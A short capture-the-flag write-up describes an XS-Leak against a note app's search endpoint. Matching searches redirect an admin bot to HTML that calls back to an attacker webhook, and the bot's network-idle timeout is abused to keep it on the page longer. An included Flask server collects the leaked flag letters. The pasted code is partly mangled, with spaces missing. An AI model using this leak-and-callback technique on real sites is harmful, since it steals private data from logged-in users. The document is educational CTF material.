In this challenge, we were given a note creating app and there was a search functionality where we can search note content. This seemed like a place to look for bugs like XS-Leaks.
The source code for search endpoint is given below.
To exploit, we can use the /search endpoint. We check if there’s any note that contains a particular string and if present, we redirect to a note that contains an HTML code that can give the webhook server a callback.
However, there was a timeout which limits the time that bot stays in the given URL.
1
2
3
4
awaitpage2.goto(website,{
waitUntil:'networkidle0',
timeout:60000}); // Opens page as logged user
But, waitUntil: 'networkidle0' means the bot will wait until there is no network connection for at least 500ms. So, it is possible to we can load a image which will delay the timeout.
from flask import Flask,request,render_template,session,redirect
app = Flask(__name__)
found =""letter =""@app.route("/")
defwelcome():
return render_template("index.html")
@app.route("/log")
deflog():
global found, letter
letter = request.args.get("current")
return found
@app.route("/webhook")
defwebhook():
global found, letter
found = found + letter
return found
@app.route("/progress")
defprogress():
global found
return found
if __name__=="__main__":
app.run(host="0.0.0.0", debug=True, port=8085)
With the above exploit, whenever a note that matches a substring of the flag, the bot gets redirected to a webhook server.
There were many interesting solutions for this challenge like abuse the redirect in the search with fetch redirect limit. Solving this challenge was fun and learnt a lot with it.